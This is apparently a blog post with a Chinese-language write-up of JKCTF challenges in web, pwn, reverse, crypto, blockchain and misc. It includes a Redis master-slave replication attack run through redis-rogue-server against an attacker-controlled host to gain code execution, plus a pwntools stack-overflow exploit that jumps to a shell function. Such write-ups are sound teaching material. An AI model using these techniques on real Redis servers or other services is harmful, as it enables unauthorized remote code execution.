web

flag~is_here

image-20220414162242629

提示说没了flag的提交框,但是给了flag,所以直接去其他flag提交框那里抓包,然后看特征去发包,这个其实爆过flag的就很容易想到了,还有一种解法是flag提交框还原

image-20220414162452306

可以看到,提交框其实并没有被删除,而是被注释了

image-20220414163208981

image-20220414163212580

但是很可惜,只是复原了它的样式,而没有复原它的功能

image-20220414163354056

抓了一个包发现,这个提交flag其实是向着/api/v1/challenges/attempt提交一个json字符串,其中包含了题目的id以及flag的值,所以接下了我们就是要找到这道题的id,然后正确提交flag就行了

image-20220414163609176

我把浏览器的抓包打开,可以发现出现了一个40,那估计就是了

image-20220414163648341

后面的那个38就很好证明了这一点

image-20220414163722826

ez_Redis

ip:121.5.169.223
port:39379
do you know how to operate redis and get the flag?

nc 121.5.169.223 39379

直接用nc去连接一下

image-20220414170548597

发现这里是可以直接执行redis命令的,也就是说直接传输redis命令进行交互,而没有使用协议,我记得我当时在做这道题的时候有一个键x,它的值就是一个反弹shell,与本地的redis进行反弹的,所以我们不需要使用任何协议就能与redis内网服务器进行交互

这时候就可以考虑redis主从复制了,原来大概就是你的vps作为主机,题目环境的redis作为从机,主机负责写文件,从机负责读取文件,就可以利用这个上传恶意so文件,最后达到RCE的目的

具体可以看看这篇文章https://paper.seebug.org/975/

后面就是直接拿脚本梭了https://github.com/n0b0dyCN/redis-rogue-server

python3 redis-rogue-server_5.py --rhost 121.5.169.223 --rport 39379 --lhost xxxxx --lport 8081

image-20220414171502382

pwn

pwn2

139.196.175.134,10001

nc 139.196.175.134 10001

题目说没有附件

image-20220414171701322

提示说使用pwntools才会有flag

直接pwntools一把梭

from pwn import *
context.log_level = "debug"
f = remote('139.196.175.134', 10001)
f.interactive()

image-20220414171756720

发现开启debug模式后输出了一串base64编码的字符串

ZmxhZ3toZWxsb19wd250b29sc30=

image-20220414171904998

pwn1

139.196.175.134,10000

nc 139.196.175.134 10000

image-20220414172405857

发现是一道栈溢出的题目,发送20是个a之后造成溢出

查了一下,32位无壳

直接拖到IDA里面分析一波

image-20220414172542378

跟进vul函数

image-20220414172603173

定义了一个字符串,长度为16,通过gets读取

image-20220414172641352

要把return顶下去,需要垫20个栈

然后找一下有没有shell

image-20220414172811640

0x080484EB

image-20220414172940018

exp

from pwn import *
context.log_level = "debug"
f = remote('139.196.175.134', 10000)
offset = 20
payload = b'a' * 20 + p32(0x080484EB)

f.sendline(payload)
f.interactive()

re

easyRE

image-20220414173040336

64位无壳

image-20220414173225267

有一个判断条件,跟进进去

image-20220414173246623

发现一大堆条件,将传入的7位字符串的每一位进行运算,直接用z3库梭哈就行

from z3 import *

s = Solver()
flag = [Int("flag[ %d ]" % i) for i in range(7)]
print(flag)
v1 = flag[4]
v2 = flag[1]
v3 = flag[3]
v4 = flag[0]
v5 = flag[5]
v6 = flag[2]
v7 = flag[6]
s.add(546 * v7 + 34 * (v4 + v3) + 454 * (v2 + v1) - 54 * (v6 + v5) == 159106)
s.add(86 * v7 + 34 * (v3 + v2) + 3 * (v4 + 2 * v5) - 454 * v1 - 4 * v6 == -32346)
s.add(34 * v2 + 134 * v4 + 46 * v7 + 74 * (v3 - v5) - 154 * v6 + 44 * v1 == 12196)
s.add(84 * v2 + 146 * v7 + 54 * (v1 + 6 * v4 + v3) - 524 * v6 - 44 * v5 == 11046)
s.add(154 * v1 + 74 * v2 + 547 * v7 + 44 * (v4 + v3) - 84 * v6 - 34 * v5 == 88328)
s.add(254 * v1 + 554 * v2 + 545 * v7 - 14 * (v6 + v5) - 4 * v4 - 34 * v3 == 143708)
s.add(34 * v2 + 134 * v3 + 4 * (6 * v4 + 11 * v1 + 61 * v7 - v5) + 54 * v6 == 60506)
if s.check() == sat:
    print(s.model())
flag[4] = 111
flag[6] = 122
flag[3] = 108
flag[2] = 108
flag[5] = 95
flag[1] = 101
flag[0] = 104
for i in range(7):
    print(chr(flag[i]), end="")

image-20220414173408923

crypto

crypto RSA's gift

这是一道原题,还是npu的去年原题,而且不原题还简单一点,范围改小了,主要考了

https://blog.csdn.net/weixin_44017838/article/details/106433677

给出exp如下

import gmpy2
from Crypto.Util.number import long_to_bytes
e = 8194
n= 16318078802588665472473623743437028192432903482106595341598932241542827303636397913013840952532302955671506620175759299228009074865839533016190944109393688073911129627195537680863581478487663662787710029252139493173787648170797475515410653436280938068936792755639336202221331824271376937191942575994271957722341525770080402243956741694887965401965295705598375158691488584112974104400455282295976772033226185652422147423889336285476661877460578489825604397795882757654795348072743715620125986360832511296948304527312260110382391185704767871191856807271112991309020058674595082459508005657307422851976862009399282269359
gift= 8159039401294332736236811871718514096216451741053297670799466120771413651818198956506920476266151477835753310087879649614004537432919766508095472054696844036955564813597768840431790739243831831393855014626069746586893824085398737757705326718140469034468396377819668101110665912135688468595971287997135978861042863969244364702850842076935869537754939731911431260475620566598820825058735036650655218713375228265555770313404136756057822451491541567430451617964323188578255369337944440379199054718721778556816771709864280129613589221737926525717410972778047365763570555977183025573956934920189555341618606514798156287080
c= 1541551233517734292638316996873398297516166502999168299751809560118164061243627554473828110461089089041311327713595921859350154568517387539154115983068910498219713309326052973113808966221136074135351820592496123629720455295129985026163373716868889298502047112519782957028609657329752355497729822476608896054826298262144514035273799710243327701109070092823008877080857703312698380022077081385997351735429485313381218570416260693439554317155978163612122373160900807689521818213514901894436625730658428868625588271559260495578031026827864238617206911506669598687998912626763233427065197086697228346385436971360108898381
print(len(bin(gift)[2:]))
print(len(bin(n)[2:]))

for i in range(1,4):
    phi = i * gift
    try:
        d= gmpy2.invert(e//2, phi)
        m_2 = pow(c, int(d), n)
        flag = long_to_bytes(gmpy2.isqrt(m_2))
        print(flag)
        print(i)
    except ZeroDivisionError:
        continue

image-20220414173651826

blockchain

nc 121.5.169.223 39149

image-20220414175524626

信息收集

[$] Welcome to the game

We design a pretty easy contract game. Enjoy it!
1. Create a game account
2. Deploy a game contract
3. Request for flag
4. Get source code
Game environment: rinkeby
Option 1, get an account which will be used to deploy the contract;
Before option 2, please transfer some eth to this account (for gas);
Option 2, the robot will use the account to deploy the contract for the problem;
Option 3, use this option to obtain the flag after the event is triggered.
You can finish this challenge in a lot of connections.
[-]input your choice: 1
[+]Your game account:0xF947DEa9728ed8b74616cB145Ed11Ed7E595e6Fa
[+]token: 3qmK53QZD/2bgsT+gu+1YBL2uWv+bqpHauGcBTUZt5lN78uWWJaR9w6pBsmyGwONs3GnkIWhThiAcBb2HnjZJToDb9Jjw/Fg6ZddzBZb4xv9mwzjmb1Am+IOQEhHjT77em1V1TCb+r6/PQ88jpfDsNa/KVXPmGQFpS2b/R2MxGo=
[+]Deploy will cost 98153 gas
[+]Make sure that you have enough ether to deploy!!!!!!

[-]input your choice: 4
pragma solidity ^0.5.10;

contract Feng {
    event SendFlag(address addr);
    function getFlag() public {
        emit SendFlag(msg.sender);
    }
}

image-20220415105232983

做不来了,摆烂

misc

海明?威

image-20220414173712560

很明显只有十二种情况,爆都只需要一分钟那种,但是我是猜测,试了第三次就出了

看标题海明?威,发现第三位打了问号,也就是说是第三位被修改了

然后就只剩三种情况了,我把每一组都试了一下,在第三次的时候flag正确,也就是说这道题的答案就是3 3,第三拖的第三位

image-20220414173936938

没啥好说的

最后修改:2022 年 07 月 25 日
© 允许规范转载
如果觉得我的文章对你有用,请随意赞赏
本文作者:
 文章标题:JKCTF
 本文地址:https://pysnow.cn/archives/108/
 版权说明:若无注明,本文皆Pysnow's Blog原创,转载请保留文章出处。